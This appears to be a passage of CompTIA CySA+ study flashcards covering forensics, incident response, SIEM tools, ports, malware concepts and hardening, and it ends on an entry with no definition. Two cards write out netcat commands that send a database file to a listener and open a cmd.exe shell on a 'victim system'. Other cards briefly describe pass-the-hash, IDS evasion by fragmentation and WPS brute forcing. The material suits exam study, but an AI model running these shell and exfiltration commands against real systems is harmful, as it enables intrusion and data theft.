CySA+
ARP Spoofing/ARP Poisoning
- occurs when an attacker redirects an IP address to a MAC address that was not its intended destination - can cause irregular peer to peer communications - use an IDS to identify the suspicious traffic patterns caused by ARP poisoning generating far more ARP traffic than usual
Google Hacking
- open-source intelligence techniques that uses Google search operators to locate vulnerable web servers and applications - use things like: Quotes, NOT, AND/OR, Scope, URL Modifiers
Footprinting *
- phase of an attack or penetration test in which the attacker or tester gathers information about the target before attacking it (targeting multiple machines) - tools that map out the layout of a network, typically in terms of IP address usage, routing topology, and DNS namespace (subdomains and hostnames)
Legitimate processes (Behavior Analysis)
1. System Idle (PID 0) and System (PID 4) 2. Client Server Runtime SubSystem (csrss.exe) 3. WININIT (wininit.exe) 4. Services.exe (services.exe or svchost.exe) * 5. Local Security Authority SubSystem (lsass.exe) 6. WINLOGON (winlogon.exe) 7. USERINIT (userinit.exe) 8. Explorer (explorer.exe, should be the parent of all processes launched by the user)
Cryptographic Analysis Tools
- tools used to determine the type of encryption algorithm used and assess the strength of the encryption key - an analyst must recover or brute force the user password to obtain the decryption key for an encrypted volume
Best practices to secure network appliances
1. Use ACLs to restrict access to designated host devices 2. monitor the number of designated interfaces 3. deny internet access to remote management
Disadvantages of Agent-based Scanning
1. agents are limited to a particular operating system 2. could be compromised by malware
Detection and Analysis IOCs Sources (technical and non-technical)
1. anti-malware software 2. NIDS/NIPS 3. HIDS/HIPS 4. system logs 5. network device logs 6. SIEM data 7. flow control device 8. internal personnel 9. external personnel 10. cyber-threat intelligence
What might make a process look suspicious?
1. any process name that you do not recognize 2. any process name that is similar to a legitimate system process (ex. scvhost) 3. processes that appear without an icon, version information, description or company name 4. processes that are unsigned, especially from a well-known company like Microsoft 5. any process whose digital signature doesn't match the identified publisher 6. any process that does not have a parent/child relationship with a principle Windows process (explorer.exe) 7. any process hosted by Windows utilities like Explorer, Notepad, Task Manager 8. any process that is packed (compressed), highlights purple in Process Explorer (while this lesson focused on manual analysis, many UEBA products can automate this process)
5 categories of events in the Windows event logs
1. application (events generated by applications and services) 2. security (audit events like failed log-on or access being denied) 3. system (events generated by the operating system and its services) 4. setup (events generated during the installation of Windows) 5. forwarded events (events that are sent to the local host from other computers)
How do attackers compromise and exploit the controller area network (CAN) bus?
1. attach the exploit to OBD-II 2. exploit over onboard cellular (cell modem) 3. exploit over onboard Wi-Fi
Steps of a XSS attack
1. attacker identifies input validation vulnerability within a trusted website 2. attackers crafts a URL to perform code injection against the trusted website 3. the trusted site returns a page containing the malicious code injected 4. malicious code runs in the client's browser with permission level as the trusted site
Newer Implementations of Syslog (improvements for drawbacks)
1. can use port 1468 (TCP) for consistent delivery 2. can use TLS to encrypt messages sent to servers 3. can use MD-5 and SHA-1 for authentication and integrity 4. can use message filters, automated log analysis, event response scripting, and alternate message formats 5. the newer version of the server is called syslog-ng or rsyslog
How can you mitigate a DDoS Attack?
1. conduct real-time log analysis to identify patterns of suspicious traffic and redirect it to a black hole or sinkhole 2. use geolocation and IP reputation data to redirect or ignore suspicious traffic 3. aggressively close slower connections by reducing timeouts on affected servers 4. use caching and backend infrastructure to offload processing to other servers 5. utilize enterprise DDoS Protection services such as Cloud Flare or Akamai
How do you mitigate non-standard port usage on your networks?
1. configure firewalls to allow only whitelisted ports to communicate on ingress and egress interfaces 2. configuration documentation should also show which server ports are allowed on any given host type (have good configuration management) 3. configure detection rules to detect mismatched protocol usage over a standard port
How can you detect and mitigate against a pass the hash attack? *
1. detecting these types of attacks is very difficult because the attacker activity cannot be easily differentiated from legitimate authentication 2. most antivirus and antimalware software will block tools that allow pass the hash attack (such as Mimikatz) 3. restrict and protect high privileged domain accounts 4. restrict and protect local accounts with administrative privileges 5. restrict inbound traffic using Windows Firewall to all workstations except for helpdesk, security compliance scanners and servers
How does an APT use modern malware to operate?
1. dropper or downloader 2. maintain access 3. strengthen access 4. actions on objectives 5. concealment
5 Steps for Conducting Containment (in order)
1. ensure the safety and security of all personnel 2. prevent an ongoing intrusion or data breach 3. identify if the intrusion is the primary or secondary attack 4. avoid alerting the attacker that the attack has been discovered 5. preserve any forensic evidence of the intrusion and attack
4 Key Controls for Mitigating Vulnerabilities in Specialized Systems
1. establish administrative control over operational technology (OT) networks by recruiting staff with relevant expertise 2. implement the minimum network links by disabling unnecessary links, services, and protocols 3. develop and test a patch management program for operational technology (OT) networks 4. perform regular audits of logical and physical access to systems to detect possible vulnerabilities and intrusions (*WARNING: Enumeration tools and vulnerability scanners can cause problems on OT networks*)
3 types of Trend Analysis
1. frequency-based 2. volume-based 3. statistical deviation
Forensic Procedures Four Main Areas:
1. identification 2. collection 3. analysis 4. reporting
What do you do when you find a suspicious process?
1. identify how the process interacts with the Registry and file system 2. determine how the process was launched 3. determine if that image file is located in the system folder or a temp folder 4. determine what files are being manipulated by the process 5. determine if the process restores itself upon reboot after deletion 6. determine if a system privilege or service gets blocked if you delete the process 7. determine if the process is interacting with the network (communication with CnC server)
What might indicate that a piece of malware is running on a part instead of an authorized application?
1. if an unknown open dynamic port (49152-65535) appears to be constantly open on a host, it may indicate a malicious traffic channel 2. non-standard port usage - communicating TCP/IP application traffic, such as HTTP, FTP, or DNS, over a port that is not the well-known or registered port established for that protocol
4 categories of severity inside the Windows event logs
1. information (used for successful events) 2. warning 3. error (significant problems that could result in reduced functionality) 4. audit success/failure
What kind of things can we expect to find when you start analyzing the image from memory?
1. list of running processes at the time of collection 2. password hashes 3. cryptographic keys (which can help you unlock encrypted hard drives that you wouldn't be able to access after you shut down the computer) 4. Registry keys 5. cached files 6. strings from open files
Four Most Common Categories to Perform System Memory Image Acquisition:
1. live acquisition 2. crash dump 3. hibernation file 4. pagefile
3 Different Ways to Perform Disk Image Acquisition
1. live acquisition (capturing the contents of the disk drive while the computer is still running) 2. static acquisition by shutting down 3. static acquisition by pulling the plug
To effectively deploy a SIEM you must consider *
1. log all relevant events and filter irrelevant data 2. establish and document scope of events 3. develop use cases to define a threat 4. plan incident response to an event 5. establish a ticketing process to track events 6. schedule regular threat hunting 7. provide auditors and analysts an evidence trail
Linux File System Analysis Tools
1. lsof 2. df 3. du
Rule options for IDS/IPS logs (Snort)
1. msg 2. flow 3. flags 4. track 5. reference 6. classtype 7. sid and rev
Best practices for configuring egress filters
1. only allow whitelisted application ports and destination addresses to leave your network 2. restrict DNS lookups to trusted and authorized DNS services 3. Block access to known bad IP address ranges (blacklist) 4. Block all internet access from host subnets that don't use it (ICS/SCADA systems)
4 Main Types of Recovery Actions
1. patching 2. permissions 3. logging 4. system hardening
3 types of Port Security
1. physical port security 2. MAC filtering 3. Network Access Control (NAC)
Digital Forensic Analysts Have Many Different Roles, Including:
1. planning IT systems and processes 2. investigating and reconstructing an incident 3. investigating if crimes occurred 4. collecting and protecting evidence 5. determining if data was exposed (data breach) 6. developing processes and tools 7. supporting ongoing audits
Key Features of a NAC solution
1. posture assessment 2. remediation 3. pre- and post-admission control
Linux Tools for Detecting Malicious Processes
1. pstree 2. ps
Advantages for using Agent-based scanning
1. reduces the impact on the network by reducing the network bandwidth 2. reduces the chance of service outages 3. better for mobile or remote devices when offline
System Hardening Security Checklist
1. remove or disable devices that are not needed or used 2. install OS, application, firmware, and driver patches regularly 3. uninstall all unnecessary network protocols 4. uninstall or disable all unnecessary services and shared folders 5. enforce ACLs on all system resources 6. restrict user accounts to the least privileges needed 7. secure the local admin or root account by renaming it and changing the default password 8. disable unnecessary default user and group accounts 9. verify permissions on system accounts and groups 10. install antimalware software and update its definitions regularly
Windows Tools for Detecting Malicious Processes
1. sfc (System File Checker) - scans all the files on the system to make sure they are protected and haven't been modified 2. Process Monitor 3. Process Explorer 4. tasklist 5. PE Explorer
Symptoms of anomalous activity include
1. strange log entries 2. excessive per-process ports 3. resource consumption 4. unusual user accounts
Different Ways Covert Channels Can Take Advantage
1. transmit data over nonstandard port (if egress filter on firewall is not enabled) 2. encoding data in TCP/IP packet headers 3. segmenting data in multiple packets 4. obfuscating data using hex 5. transmitting encrypted data
3 Simple Mottos for System Hardening *
1. uninstall anything you aren't using 2. if you need it, patch it frequently 3. always restrict users to least privilege
Unexpected Output (Anomalous Activity)
- unusual request patterns or responses can be indicative of an ongoing or past attack - detect a code injection by monitoring number of database reads or examining HTTP response packet sizes - if an application displays unformatted error messages or strange strings, it could be an indication of application tampering
Netcat (nc)
- utility for reading and writing raw data over a network connection that is often used as a listener for remote shells - can also be used with scripting or redirection to send and receive files
Unexpected Outbound Communication (Anomalous Activity)
- verify any outbound network connections (must understand and approve any connections leaving your network) - unexpected outbound communication could be a sign of a C2 channel or beaconing
Lost System Logs (Virtualization Forensics)
- virtual machines are optimized to spin up when needed and be destroyed when no longer required - *Solution* configure virtual machines to log events to a remote logging server to prevent system logs from being lost during deprovisioning
grep command line tools
-i (ignore case sensitivity) -v (return non-matching strings) -w (treat search strings as words) -c (return a count of matching strings only) -l (return names of files with matching lines) -L (return names of files without matching lines)
dir /Ax
/Ax filters all file/folder types that match the given parameter (x), such as dir/AH displays only hidden files and folders
dir /Q
/Q displays who owns each file, along with the standard information
dir /R
/R displays alternate data streams for a file
Basic principles for configuring firewall ACLs
1. Block incoming requests from internal or private, loopback, and multicast IP address ranges 2. Block incoming requests from protocols that should only be used locally (ICMP, DHCP, OSPF, SMB, etc) 3. configure IPv6 to either block all IPv6 traffic or allow it to authorized hosts and ports only
Order of Volatility (Descending from most volatile to least)
1. CPU registers and cache memory 2. contents of system memory (RAM), routing tables, ARP cache, process table, temporary swap files 3. data on persistent mass storage (HDD/SDD/flash drive) 4. remote logging and monitoring data 5. physical configuration and network topology 6. archival media
5 Different Types of Breaches (descending from most significant to least)
1. Data Exfiltration (an attacker breaks into the system and transfers data to another system) 2. Insider Data Exfiltration (an employee/ex employee with privileges on the system transfers data to another system) 3. Device Theft/Loss (a device, such as a smartphone or laptop, containing data is lost or stolen) 4. Accidental Data Breach (public disclosure of information or unauthorized transfer caused by human error or misconfiguration) 5. Integrity/Availability Breach (corruption of data or destruction of a system processing data)
Incident Classification Categories
1. Data integrity (any incident where data is modified or loses integrity) 2. System Process Criticality (incidents that disrupt or threaten a mission essential business function) 3. Downtime (an incident that degrades or interrupts the availability of an asset, system, or business process) 4. Economic (an incident that creates short-term or long-term costs) 5. Data Correlation (an incident that is linked to the TTP of known adversary groups with extensive capabilities) 6. Reverse Engineering (an incident which the capabilities of the malware are discovered to be linked to an adversary group) 7. Recovery Time (an incident which requires extensive recovery time due to its scope or severity) 8. Detection Time (an incident which was not discovered quickly)
Defensive Capabilities
1. Detect 2. Destroy 3. Degrade 4. Disrupt 5. Deny 6. Deceive
Forensic Tools Include:
1. EnCase 2. The Forensic Toolkit (FTK) 3. The Sleuth Kit
7 Step Process for Scanning Workflow (Vulnerability Scanning)
1. Install software and patches to establish a baselined system 2. perform an initial scan of the target system 3. analyze the assessment reports based on the baseline 4. perform corrective actions based on reported findings 5. perform another vulnerability scan and assessment 6. document any findings and create reports for relevant stakeholders 7. conduct ongoing scanning to ensure continual remediation (*Scan, Patch, Scan*)
Command and Control servers must issue commands to its zombies in the botnet using various communication channels, these include:
1. Internet Relay Chat (IRC) 2. HTTP and HTTPS 3. Domain Name System (DNS) 4. Social Media Websites 5. Cloud Services 6. Media and Document Files
Common Tools Used by Pentesters
1. Metasploit 2. Cobalt Strike 3. Kali Linux 4. ParrotOS 5. Commando OS
Incident Response Phases (CompTIA model)
1. Preparation 2. Detection & Analysis 3. Containment 4. Eradication & Recovery 5. Post-Incident Activity
How do you set up a listener to receive a file?
1. Setup a Listener to Receive: nc -l -p 53 > database.sql 2. Send a File to Listener type database.sql | nc 10.1.0.21 53 (type = print this file to screen, but by using the pipe command we can push it to the netcat listener)
How do you set up a regular shell on a victim system?
1. Setup a Listener: nc -l -p 443 -e cmd.exe (-l = listening, -p = port, -e = execute) 2. Connect to Listener: nc 10.1.0.1 443 (10.1.01 = the IP address im trying to connect to)
Common IDS/IPS softwares
1. Snort 2. Zeek (Bro) 3. Security Onion
Types of SIEM solutions
1. Splunk 2. ELK/Elastic Stack 3. ArcSight 4. QRadar 5. Alien Vault and OSSIM 6. Graylog
A nmap discovery scan is used to ...
Footprint the network
What is the key difference between Fingerprinting and Footprinting?
Footprinting is focused on the overall network layout, while Fingerprinting is focused on a single host or server
While a pass the hash attack will work on local workstations, a _______ ticket is needed in an Active Directory environment
Kerberos
Port 445 (UDP)
MICROSOFT-DS (Supports Windows File Sharing)
Port 445 (TCP)
MICROSOFT-DS (supports Windows File Sharing ~Server Message Block over TCP/IP~ on current Windows networks) (Windows only)
Malware Information Sharing Projects (MISP - Indicator Management)
MISP provides a server platform for cyber threat intelligence sharing, a proprietary format, supports OpenIOC definitions, and can import and export STIX over TAXII
Port 1434 (UDP port)
MS-SQL (Microsoft SQL Server) (Windows only)
Port 135 (UDP)
MSRPC (advertises what RPC services are available in a Windows environment)
Port 135 (TCP)
MSRPC (advertises what RPC services are available in a Windows environment) (Windows only)
_____ and _____ help to determine which business functions are critical and to specify appropriate risk countermeasures
MTD, RPO
Deny
Prevent an adversary from learning about your capabilities or accessing your information assets (ex. Firewall ACL, NIPS, Proxy filter, Patch, chroot jail)
FTP Access Logs
a log containing FTP traffic events in a W3C extended log format
Business Continuity Loss
a loss associated with no longer being able to fulfill contracts and orders due to the breakdown of critical systems
Cross-Site Request Forgery (XSRF/CSRF)
a malicious script hosted on the attacker's site that can exploit a session started on another site in the same browser
behavior-based detection
a malware detection method that evaluates an object based on its intended actions before it can actually execute that behavior
Splunk
a market-leading big data information gathering and analysis tool that can import machine-generated data via a connector or visibility add-on
eFUSE
a means for software or firmware to permanently alter the state of a transistor on a computer chip (if the eFUSE is blown that means that firmware is no longer valid or trusted)
Memory Overflow
a means of exploiting a vulnerability in an application to execute arbitrary code or to crash the process (or with an ongoing memory leak to crash the system)
Flow Collector
a means of recording metadata and statistics about network traffic rather than recording each frame
Reimaging
a method of restoring a system that has been sanitized using an image-based backup
Reconstruction
a method of restoring a system that has been sanitized using scripted installation routines and templates
Zero-fill
a method of sanitizing a drive by overwriting all bits on a drive to zero (typically done with hard drives)
Cryptographic Erase (CE)
a method of sanitizing a self-encrypting drive (SSDs) by erasing the media encryption key
Secure Erase (SE)
a method of sanitizing a solid-state device (SSDs) using manufacturer provided software
Secure Disposal
a method of sanitizing that utilizes the physical destruction of the media by mechanical shredding, incineration, or degaussing (used for top secret data or high classification)
Domain Generated Algorithm (DGA)
a method used by malware to evade blacklists by generating domain names for C2 networks dynamically
Fast Flux Network
a method used by malware to hide the presence of C2 networks by continually changing the host IP addresses in domain records using domain generated algorithms (DGA)
Return on Security Investment (RSOI)
a metric to calculate whether a security control is worth the cost of deploying and maintaining it
Mobile Phone Examiner Plus (MPE+)
a mobile device forensics tool created by AccessData (the developers of FTK)
EnCase Portable (Mobile Device Forensics)
a mobile device forensics tool created by Guidance Software (the developers of EnCase)
Enterprise Mobility Management (EMM)
a mobile device management suite with broader capabilities, such as identity and application management
Yara
a multi-platform program running on Windows, Linux and Mac OS X for identifying, classifying, and describing malware samples (creates Yara rules)
Demilitarized Zone (DMZ)
a physical or logical subnetwork that contains and exposes an organizations external-facing services to an untrusted, usually larger, network such as the Internet
Downloader
a piece of code that connect to the Internet to retrieve additional tools after the initial infection by a dropper (stage 2)
Connectors or Plug-ins (Data Normalization)
a piece of software designed to provide parsing and normalization functions to a particular SIEM
Probing
a preliminary attack that is used to conduct reconnaissance or enumeration against a web service
Virtual Private Cloud (VPC)
a private network segment made available to a single cloud consumer within a public cloud (consumer is responsible for configuring the IP address space and routing within the cloud) (is typically used to provision internet-accessible applications that need to be accessed from geographically remote sites) (considered an IaaS product)
Continuous Delivery (CI/CD)
a software development method where application and platform requirements are frequently tested and validated for immediate availability (must have continuous integration before this) (focuses on automated testing of code in order to get it ready for release)
Port 1900 (UDP port)
UPNP (universal plug and play is used for auto-configuration of port forwarding by gaming consoles and other smart appliances)
Continuous Deployment (CI/CD)
a software development method where application and platform updates are committed to production rapidly (focuses on automated testing and release of code in order to get it into the production environment more quickly) (takes it a step further then continuous delivery by releasing the code)
Port 5900 (TCP)
VNC (virtual network computing remote access service where security is implementation dependent and VNC may use other ports) (Unix, Linux, MacOS, Windows)
XML Bomb (Billion Laughs Attack)
XML encodes entities that expand to exponential sizes, consuming memory on the host and potentially crashing it (similar to DoS)
Sinkhole
a DoS attack mitigation strategy that directs the traffic that is flooding a target IP address to a different network for analysis
pstree
a Linux command that provides the parent/child relationship of the processes on a given system
Security Content Automation Protocol (SCAP)
a NIST framework that outlines various accepted practices for automating vulnerability scanning by adhering to standards for scanning processes, results reporting and scoring, and vulnerability prioritization (used to uphold internal and external compliance requirements) - 2 main components: OVAL and XCCDF
Sensors (Data Normalization)
a SIEM can collect packet capture and traffic flow data from sniffers and sensors positions across the network
ArcSight
a SIEM log management and analytics software that can be used for compliance reporting for legislation and regulations like HIPPA, SOX, and PCI DSS
QRadar
a SIEM log management, analytics, and compliance reporting platform created by IBM
sigcheck
a Sysinternals utility that allows you to verify root certificates in the local store against Microsoft's master trust list
Measured Boot
a UEFI feature that gathers secure metrics to validate the boot process in an attestation report
Secure Boot
a UEFI feature that prevents unwanted processes from executing during the boot operation
dd (.dd format)
a Unix/Linux/MacOS command that can perform disk image acquisition (disk duplicator)
certutil
a Windows utility that allows you to display CA configuration information, configure Certificate Services, backup and restore CA components, and verify the certificates key pair, and certificate chains
Widows Firewall
a Windows-based firewall that uses the W3C Extended Log File Format
Daemons
a background service in the Linux operating system that runs as a process with the letter 'd' after it (e.g, httpd, sshd, ftpd)
Mission Essential Function (MEF) *
a business or organizational activity that is too critical to be deferred for anything more than a few hours (if at all)
Playbook
a checklist of actions an analyst performs to detect and respond to a specific type of incident
Attestation
a claim that the data presented in the report is valid by digitally signing it using the TPM's private key
Rootkit
a class of malware that modifies system files (often at the kernel level) to conceal its presence
Security Orchestration, Automation, and Response (SOAR)
a class of security tools that facilitates incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment (SIEM 2.0) (next-gen SIEM, a SIEM with an integrated SOAR) (primarily used for incident response)
unknown unknowns
a classification of malware that contains completely new attack vectors and exploits
known unknowns
a classification of malware that contains obfuscation techniques to circumvent signature-matching and detection
Function as a Service (FAAS)
a cloud service model that supports serverless software architecture by provisioning runtime containers in which code is executed in a particular programming language (essentially it allows us to run things and create applications without having our own servers)
Qualys
a cloud-based vulnerability management solution with installed sensor agents at various points in their network and the sensors upload data to the cloud platform for analysis
DevSecOps
a combination of software development, security operations, and system operations by integrating each discipline with the others (utilizes a shift-left mindset, which means security is developed earlier in the lifecycle)
grep (commands that rely on regex) *
a command on Unix/Linux/macOS systems that invokes simple string matching or regex syntax to search text files for specific strings (use grep to search the contents if analyzing the contents on Linux)
sort (commands that rely on regex)
a command that can be used to change the output order
cut (commands that rely on regex)
a command that enables the user to specify which text on a line they want removed from the results
head (commands that rely on regex)
a command that outputs the first 10 lines of a file specified
tail (commands that rely on regex)
a command that outputs the last 10 lines of a file specified (this command is very useful when dealing with logs)
Reaver (Wireless Assessment Tools)
a command-line tool used to perform brute force attacks against WPS-enabled access points
Nessus
a commercial vulnerability scanner produced by Tenable Network Security for on-premise and cloud-based vulnerability scanning
Enterprise Service Bus (ESB)
a common component of SOA architecture that facilitates decoupled service-to-service communication
SysAdmin, Network, and Security (SANS) institute
a company specializing in cybersecurity and secure web application development training and sponsors the GIAC certification
Machine Learning
a component of AI that enables a machine to develop strategies for solving a task given a labeled dataset where features have been manually identified but without further explicit instructions
Machine Learning (ML)
a component of AI that enables a machine to develop strategies for solving a task given a labeled dataset where features have been manually identified but without further explicit instructions (is only as good as the datasets used to train it) (assists with data correlation)
Full/Deep Assessment Scan
a comprehensive scan that forces the use of more plug-in types, takes longer to conduct host scanning, and has more risk of causing a service disruption
Embedded Systems
a computer system that is designed to perform a specific, dedicated function
Blinding Attack
a condition that occurs when a firewall is under-resourced and cannot log data fast enough, therefore some data is missed
Cross Origin Resource Sharing (CORS) Policy
a content delivery network policy that instructs the browser to treat requests from nominated domains as safe (*WARNING: weak CORS policies expose the site to vulnerabilities like XSS*)
Service Level Agreement (SLA)
a contractual agreement setting out the detailed terms under which an ongoing service is provided
tcpdump
a data-network packet analyzer computer program that runs under a command line interface and allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached
Exception Management
a defined process to closely monitor systems that cannot be patched or remediated and must be excepted from scans
OAuth (Open Authorization)
a delegated authorization framework for RESTful APIs that enables apps to obtain limited access (scopes) to a user's data without giving away a user's password (OAuth2 is explicitly designed to authorize claims and not authenticate users) (must be paired with another tool to perform authentication, typically uses OIDC for authentication) (*OAuth2 is vulnerable to CSRF attacks and open redirects*)
Forensic Watermark
a digital watermark can defeat attempts at removal by cropping pages or images in the file
Self-Encrypting Drives
a disk drive where the controller can automatically encrypt data that is written to it (uses firmware to run the encryption process and all of this is done at the hardware level)
Fuzzing
a dynamic code analysis technique that involves sending a running application random and unusual input to evaluate how the application responds (is a technique designed to test software for bugs and vulnerabilities)
Debugger
a dynamic testing tool used to analyze software as it executes (allows us to pause execution and to monitor/adjust the value of variables at different stages)
Hibernation File (System Memory Image Acquisition)
a file that is written to the disk when the workstation is put into a sleep state (drawback is some malware can detect the use of a sleep state and perform anti-forensics)
Prefetch Files *
a file that records the names of applications that have been run, as well as the data and time, file path, run count, and DLLs used by the executable
pagefile/swap file (System Memory Image Acquisition)
a file that stores pages of memory in use that exceed the capacity of the host's physical RAM modules (is not structured in a way that analysis tools can interpret but can be used to search for strings)
Pretext
a form of social engineering in which an individual lies and provides a false motive to obtain privileged data
Narrative-based Threat Awareness and Intelligence
a form of trend analysis that is reported in longform prose to describe a common attack vector seen overtime
OpenIOC (Indicator Management)
a framework by Mandiant that uses XML-formatted files for supplying codified information to automate incident detection and analysis
Diamond Model of Intrusion Analysis (Attack Framework)
a framework for analyzing cybersecurity incidents and intrusions by exploring the relationships between four core features: adversary, capability, infrastructure, and victim
Domain-Based Message Authentication, Reporting, and Conformance (DMARC)
a framework for ensuring proper application of SPF and DKIM utilizing a policy published as a DNS record (can use either SPF or DKIM or both)
Wireshark
a free and open-source GUI-based packet analyzer that is used for network troubleshooting, analysis, software and communications protocol development, and education
Statistical/Lexicon (DLP Discovery and Classification)
a further refinement of partial document matching is to use machine learning to analyze a range of data sources
Internet Relay Chat (IRC)
a group communication protocol with networks divided into discrete channels that are the individual forums used by clients to chat
Regular Expression (regex)
a group of characters that describe how to execute a specific search pattern on a given text
Internet of Things (IoT)
a group of objects (electronic or not) that are connected to the wider Internet by using embedded electronic components
Jumpbox
a hardened server that provides access to other hosts within the DMZ (allows secure communication from the internal network to hosts within the DMZ) (typically configure VMs as Jumpboxes)
Vulnerability Scanner
a hardware appliance or software application that is configured with a list of known weaknesses and exploits and can scan for their presence in a host operating system or within a particular application
Registry
a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for the kernel, device drivers, services, Security Accounts Manager, and the user interface
Virtualization
a host computer is installed with a hypervisor that can be used to install and manage multiple guest operating systems or VMs
Digital Forensics Kit
a kit containing the software and hardware tools required to acquire and analyze evidence from system memory dumps and mass storage file systems
MITRE ATT&CK Framework (Attack Framework)
a knowledge base maintained by the MITRE Corporation for listing and explaining specific adversary tactics, techniques, and common knowledge or procedures
Due Diligence
a legal principle that a subject has used best practice or reasonable care when setting up, configuring, and maintaining a system
iptables
a linux-based firewall that uses the syslog file format for its logs
Access Control Lists (ACL)
a list of IP addresses and ports that are allowed or denied access to the network segment or zone
Script
a list of commands that are executed by a certain program or scripting engine (Bash, PowerShell, Python, Ruby, AWK)
Access Control List (ACLs)
a list of permitted and denied network connections based on either IP addresses, ports, or applications in use
Continuous Integration (CI/CD)
a software development method where code updates are tested and committed to a development or build server/code repository rapidly (can test and commit updates multiple times per day) (detects and resolves development conflicts early and often)
Agile Method
a software development model that focuses on iterative and incremental development to account for evolving requirements and expectations
Waterfall Method
a software development model where the phases of the SDLC cascade so that each phase will start only when all tasks identified in the previous phase are complete (traditional method)
Stress Test
a software testing method that evaluates how software performs under extreme load (is used to determine what could trigger a DoS)
Dereferencing
a software vulnerability that occurs when the code attempts to remove the relationship between a pointer and the thing it points to
Race Conditions
a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer (can be used against databases, file systems, operating system, kernel, or memory)
802.1X
a standard for encapsulating EAP (Extensible Authentication Protocol) communications over a LAN or wireless LAN and that provides port-based authentication
Malware Attribute Enumeration and Characterization (MAEC) Scheme
a standardized language for sharing structured information about malware that is complementary to STIX and TAXII to improve the automated sharing of threat intelligence
SIEM Correlation Rule
a statement that matches certain conditions as expressed using logical expressions, such as AND and OR, and operators, such as == (matches), < (less than), > (greater than), and in (contains)
Normalization (Secure Coding)
a string is stripped of illegal characters or substrings and converted to the accepted character set
Exact Data Match (EDM) (DLP Discovery and Classification)
a structured database of string values to match
Port-based NAC
a switch (or router) that performs some sort of authentication of the attached device before activating the port
Vulnerability Feed
a synchronized list of data and scripts used to check for vulnerabilities, also known as plug-ins or network vulnerability tests (NVTs) (similar to antivirus signatures)
Business Impact Analysis (BIA)
a systematic activity that identifies organizational risks and determines their effect on ongoing, mission critical operations
cron
a task scheduler in Linux that can configure processes to run as daemons (background processes or services) during the machines startup
Parameterized Queries
a technique that defends against SQL injection and insecure object references by incorporating placeholders in a SQL query (form of output encoding)
Address Space Layout Randomization (ASLR)
a technique that randomizes where components in a running application are placed in memory to protect against buffer overflows
Fast Flux DNS
a technique that rapidly changes the IP addresses associated with a domain (can be detected by looking at communication patterns in the proxy logs)
nmap -f or --mtu (Fragmentation)
a technique that splits the TCP header of each probe between multiple IP datagrams to make it harder for an IDS or IPS to detect
Policy Template (DLP Discovery and Classification)
a template contains dictionaries optimized for data points in a regulatory or legislative schema (specialized dictionary)
Buffer
a temporary storage area that a program uses to store data
JSON Web Tokens (JWT)
a token format that contains a header, payload, and signature in the form of a JavaScript Object Notation (JSON) message (similar to OAuth, used for authorization)
regdump
a tool that dumps the contents of the registry in a text file with simple formatting so that you can search specific strings in the file using the 'find' command
curl
a tool to transfer data from or to a server, using of the supported protocols (HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, DICT, TELNET, LDAP, FILE) (used to test APIs)
Multi Router Traffic Grapher (MRTG)
a tool used to create graphs showing traffic flows through the network interfaces of routers and switches by polling the appliances using the Simple Network Management Protocol (SNMP)
HIDS/HIPS (endpoint protection tool)
a type of IDS/IPS that monitors a computer system for unexpected behavior or drastic changes to the system's state on an endpoint
Real-Time Operating System (RTOS)
a type of OS that prioritizes deterministic execution of operations to ensure consistent response for time-critical tasks
Programmable Logic Controller (PLC) (Embedded System)
a type of computer designed for deployment in an industrial or outdoor setting that can automate and monitor mechanical systems (runs on firmware which can be patched and reprogrammed to fix vulnerabilities)
System Isolation (Air Gap)
a type of network isolation that physically separates a network from all other networks
Session Hijacking
a type of spoofing attack where the attacker disconnects a host then replaces it with his or her own machine, spoofing the original host's IP address (can occur through the theft or modification of cookies)
Unified Extensible Firmware Interface (UEFI)
a type of system firmware providing support for 64-bit CPU operation at boot, full GUI and mouse operation at boot, and better boot security (Secure Boot, Measured Boot)
Containerization
a type of virtualization applied by a host operating system to provision an isolated execution environment for an application
Process Identification (PID)
a unique identification number of a process launched by a Linux system
parent process ID (PPID)
a unique identification number of the parent process for every process launched by a Linux system
Nmap Security Scanner
a versatile port scanner used for topology, host, service, and OS discovery and enumeration
Virtual Desktop Infrastructure (VDI) *
a virtualization implementation that separates the personal computing environment from a user's physical computer (disadvantage is that users have no local processing ability if the server or network is down)
Web Application Scanner
a vulnerability testing tool designed to identify issues with web servers and web applications (used to detect XSS, SQL injection, and other types of web attacks)
Remote Code Execution
a vulnerability that allows an attacker to transmit code from a remote host for execution on a target host or a module that exploits such a vulnerability
File Inclusion
a web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system (by using directory traversal) or to upload an executable or script file to open a backdoor (this is a type of directory traversal)
reference (rule options)
able to match an entry to an attack database (ex. you might want to have it match the MITRE ATT&CK database, so you'd have an ID number that matches that)
Discretionary Access Control (DAC)
access control model where each resource is protected by an ACL managed by the resources owner (e.g, Windows)
Role-base Access Control (RBAC)
access control model where resources are protected by ACLs that are managed by administrators and that provide user permissions based on job functions
Mandatory Access Control (MAC)
access control model where resources are protected by inflexible, system defined rules where resources (object) and user (subject) is allocated a clearance level (or label)
Attribute-Based Access Control (ABAC)
access control technique that evaluates a set of attributes that each subject possesses to determine if access should be granted (can be used to implement controls for separation of duties)
Persistent Data Acquisition (Virtualization Forensics)
acquiring data from persistent devices, such as virtual hard drives and other virtualized mass storage devices to an image-based format
Taxonomy-based Approach (Impact Analysis)
an approach that defines incident categories at the top level, such as worm outbreak, phishing attempt, DDoS, external host/account compromise, or internal privilege abuse
Artificial Neural Networks (ANNs)
an architecture of input, hidden, and output layers that can perform algorithmic analysis of a dataset to achieve outcome objectives (a machine learning system adjusts its neural network to reduce errors and optimize objectives)
Integer Overflow
an attack in which a computed result is too large to fit in its assigned storage space, which may lead to crashing or data corruption, and may trigger a buffer overflow
Buffer Overflow
an attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory
XML External Entity (XXE)
an attack that embeds a request for a local resource (similar to file inclusion)
Coercive Parsing
an attack that modifies requests to a SOAP web service in order to cause the service to parse the XML-based requests in a harmful way (can cause an exploit to run or a DoS)
DDoS (Traffic Spikes)
an attack that uses multiple compromised hosts (a botnet) to overwhelm a service with request or response traffic
Prowler
an auditing tool for AWS that is used to evaluate the cloud infrastructure against AWS benchmarks, GDPR compliance, and HIPAA compliance
OpenID Connect (OIDC)
